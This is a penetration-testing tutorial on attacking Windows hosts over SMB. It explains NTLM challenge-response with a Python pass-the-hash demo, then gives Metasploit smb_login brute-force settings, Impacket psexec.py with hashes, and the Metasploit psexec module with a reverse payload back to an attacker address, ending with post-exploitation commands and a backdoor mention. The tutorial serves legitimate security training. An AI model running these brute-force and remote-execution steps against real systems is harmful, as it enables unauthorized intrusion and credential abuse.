# Exploiting SMB With PsExec

## **SMB:**

* SMB (Server Message Block) is a network file sharing protocol used to share files and peripherals (printers and serial ports) between computers on a local area network (LAN).
* Modern SMB runs directly over TCP on port 445. Originally it ran on top of NetBIOS over TCP/IP, which uses port 139, and many hosts still expose both.
* Samba is the open source implementation of SMB for Linux and other Unix-like systems; it lets Windows systems access shares and printers hosted on Linux, and vice versa.

## SMB Authentication:

* The SMB protocol supports two security modes, or levels of authentication:
  * User-level authentication
  * Share-level authentication
* User-level authentication - Users must supply a username and password to authenticate to the SMB server before they can access a share. This is the mode used by modern Windows systems.
* Share-level authentication - A single password is attached to each restricted share, and anyone who knows it can access that share. This is a legacy mode that is rarely seen today.

Note: In both modes the password itself is never sent over the wire. SMB uses a challenge-response scheme (NTLM, with Kerberos preferred in domain environments): the server sends a random challenge and the client answers with a value computed from the challenge and the password hash, so possession of the hash alone is enough to authenticate.
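The following is an added example, not part of the original notes, showing what "challenge-response" means for SMB in practice. It implements the NT hash (MD4 over the UTF-16LE password) and the NTLMv2 exchange from MS-NLMP in pure Python, then plays a server verifying three logons: one with the real password, one where the client holds only the hash (pass-the-hash, the reason PsExec-style tools accept hashes), and one with a wrong password. The challenges, the `Administrator`/`WORKGROUP` names and the trimmed target-info blob are constructed assumptions; real clients echo the server's target info in that blob.

```python
"""NTLMv2 challenge-response as used by SMB: the client proves knowledge of the
NT hash of the password, never the password itself (added example)."""
import hmac
import struct

MASK = 0xFFFFFFFF


def _rotl(x: int, n: int) -> int:
    return ((x << n) | (x >> (32 - n))) & MASK


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4 in pure Python (OpenSSL 3 builds often disable it)."""
    r = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)
    rounds = [  # (mixing function, message word order, shifts, additive constant)
        (lambda x, y, z: (x & y) | (~x & z), list(range(16)), (3, 7, 11, 19), 0),
        (lambda x, y, z: (x & y) | (x & z) | (y & z),
         [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15], (3, 5, 9, 13), 0x5A827999),
        (lambda x, y, z: x ^ y ^ z,
         [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], (3, 9, 11, 15), 0x6ED9EBA1),
    ]
    for off in range(0, len(msg), 64):
        w = struct.unpack("<16I", msg[off:off + 64])
        s = r[:]
        for f, order, shifts, k in rounds:
            for i in range(16):
                t = (-i) % 4  # register updated this step cycles a, d, c, b, ...
                a, b, c, d = (s[(t + j) % 4] for j in range(4))
                s[t] = _rotl((a + f(b, c, d) + w[order[i]] + k) & MASK, shifts[i % 4])
        r = [(u + v) & MASK for u, v in zip(r, s)]
    return struct.pack("<4I", *r)


def nt_hash(password: str) -> bytes:
    """NT hash = MD4(UTF-16LE(password)); this is what the SAM / DC stores."""
    return md4(password.encode("utf-16-le"))


def ntowf_v2(nt: bytes, user: str, domain: str) -> bytes:
    """NTOWFv2 (MS-NLMP 3.3.2): binds the NT hash to upper-cased user and domain."""
    return hmac.new(nt, (user.upper() + domain).encode("utf-16-le"), "md5").digest()


def ntlmv2_response(nt: bytes, user: str, domain: str, server_challenge: bytes,
                    client_challenge: bytes, timestamp: int = 0) -> bytes:
    """NtChallengeResponse = NTProofStr || temp. Assumption: the target-info
    AV pairs are left out and only the MsvAvEOL terminator is kept."""
    assert len(server_challenge) == 8 and len(client_challenge) == 8
    temp = (b"\x01\x01" + b"\x00" * 6          # RespType, HiRespType, reserved
            + struct.pack("<Q", timestamp)      # FILETIME
            + client_challenge
            + b"\x00" * 12)                     # reserved, MsvAvEOL, reserved
    proof = hmac.new(ntowf_v2(nt, user, domain), server_challenge + temp, "md5").digest()
    return proof + temp


def server_verify(stored_nt: bytes, user: str, domain: str,
                  server_challenge: bytes, response: bytes) -> bool:
    """The server recomputes NTProofStr from its stored NT hash and the client's
    temp blob; it never sees, and never needs, the password."""
    proof, temp = response[:16], response[16:]
    expected = hmac.new(ntowf_v2(stored_nt, user, domain),
                        server_challenge + temp, "md5").digest()
    return hmac.compare_digest(proof, expected)


def demo() -> dict:
    """Constructed walk-through: password logon, pass-the-hash logon, wrong password."""
    user, domain = "Administrator", "WORKGROUP"          # assumed names
    stored = nt_hash("password")                          # what the target's SAM holds
    srv_chal = bytes.fromhex("0123456789abcdef")          # constructed challenges
    cli_chal = bytes.fromhex("aaaaaaaaaaaaaaaa")
    with_password = ntlmv2_response(nt_hash("password"), user, domain, srv_chal, cli_chal)
    with_hash_only = ntlmv2_response(stored, user, domain, srv_chal, cli_chal)
    wrong = ntlmv2_response(nt_hash("Password1"), user, domain, srv_chal, cli_chal)
    return {
        "nt_hash": stored.hex(),
        "password_logon_ok": server_verify(stored, user, domain, srv_chal, with_password),
        "pass_the_hash_ok": server_verify(stored, user, domain, srv_chal, with_hash_only),
        "wrong_password_ok": server_verify(stored, user, domain, srv_chal, wrong),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

Run it and the second logon succeeds although that client was never given the password, which is exactly what makes a dumped NT hash as useful to `psexec.py -hashes` or Metasploit's `SMBPass` as the password itself.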


## PsExec Tool

* [**`PsExec`**](https://learn.microsoft.com/en-us/sysinternals/downloads/psexec) is a lightweight telnet-replacement tool from Microsoft's Sysinternals suite that lets you execute processes on remote Windows systems using the credentials of any user who has administrative rights on the target.
* Authentication with PsExec is performed via SMB: it connects to the target's `ADMIN$` share, copies a service binary (`PSEXESVC.exe`) there and starts it as a Windows service, which is why local administrator privileges on the target are required.
* It can be used to authenticate with the target system legitimately and run arbitrary commands or launch a remote command prompt.
* PsExec serves a similar purpose to RDP, but instead of controlling the remote system through a GUI, commands are sent through a remote CMD session.

## SMB Exploitation With PsExec

* To use PsExec to gain access to a Windows target, we need to identify legitimate user accounts along with their passwords or NTLM password hashes; because SMB authentication only proves knowledge of the hash, a hash works as well as the password (pass-the-hash).
* Various tools and techniques can be used for this purpose, but a common approach is to perform an SMB login brute-force attack.
* To make the brute-force attack more efficient, we can focus on common Windows user accounts such as `Administrator`, which also satisfies PsExec's requirement for an administrative account.
* Once we have valid credentials, we can use PsExec to authenticate with the target system and execute arbitrary system commands or establish a reverse shell.

## Attack Flow for SMB With **Metasploit** & PsExec

### 1. **Verify SMB Service**

**Objective:** Confirm whether the target host has the SMB service enabled.

**Command:**

```bash
nmap -sV -p 139,445 <Target_IP>
```

**Description:** Scan ports 139 and 445 on the target system with version detection (`-sV`) to check whether the SMB (Server Message Block) service is available and to see what service name and version nmap reports for it.

### 2. **Identify Valid Credentials**

**Objective:** Obtain valid credentials to access the SMB service.

**Command:**

```bash
msfconsole
```

**In Metasploit Framework:**

```bash
use auxiliary/scanner/smb/smb_login
set RHOSTS <Target_IP>
set USER_FILE <path_to_user_list>
set PASS_FILE <path_to_password_list>
set STOP_ON_SUCCESS true
run
```

**Description:** Use the `smb_login` module in Metasploit to perform a brute-force or credential-stuffing attack and find valid SMB user credentials. `STOP_ON_SUCCESS` stops trying further passwords for a user once one works, which reduces noise and lockout risk. For a domain account, set `SMBDomain` as well.

### 3. **Gain Command-Line Access**

**Objective:** Use valid credentials to get command-line access on the target system.

**Method A: Using Impacket's `psexec.py`**

**Command:**

```bash
psexec.py <user>@<Target_IP> cmd.exe
```

**Description:** Execute the `cmd.exe` shell on the target system using `psexec.py`, the Python reimplementation of PsExec from the Impacket library that runs on Linux. With this syntax it prompts for the password; alternatively pass `<user>:<password>@<Target_IP>`, or supply a captured hash instead of a password with `-hashes <LMHASH>:<NTHASH>` (pass-the-hash). Prefix the user with `<domain>/` for a domain account.

**Method B: Using Metasploit's `psexec` Module**

**Command:**

```bash
use exploit/windows/smb/psexec
set RHOSTS <Target_IP>
set SMBUser <user>
set SMBPass <password>
set LHOST <Attacker_IP>
exploit
```

**Description:** Use the `psexec` exploit module in Metasploit with the provided credentials. It uploads a service binary carrying the selected payload through the `ADMIN$` share and starts it as a service, which by default returns a Meterpreter session rather than a plain `cmd.exe` shell; `LHOST` is the address the reverse payload connects back to. `SMBPass` also accepts an `LMHASH:NTHASH` pair in place of a password for pass-the-hash.

### 4. **Post-Exploitation Actions**

**Objective:** Perform further actions on the target system once command-line access is established.

**Examples:**

* **Enumerate system information:**

  ```cmd
  systeminfo
  ```
* **Check which users have sessions on the host:**

  ```cmd
  query user
  ```
* **List running processes:**

  ```cmd
  tasklist
  ```
* **Establish a persistent backdoor or further exploit vulnerabilities.**

***

**Hacker's Mantra:** *Hackers are becoming more sophisticated in conjuring up new ways to hijack your system by exploiting technical vulnerabilities or human nature. Don't become the next victim of unscrupulous cyberspace intruders.* - **Kevin Mitnick**
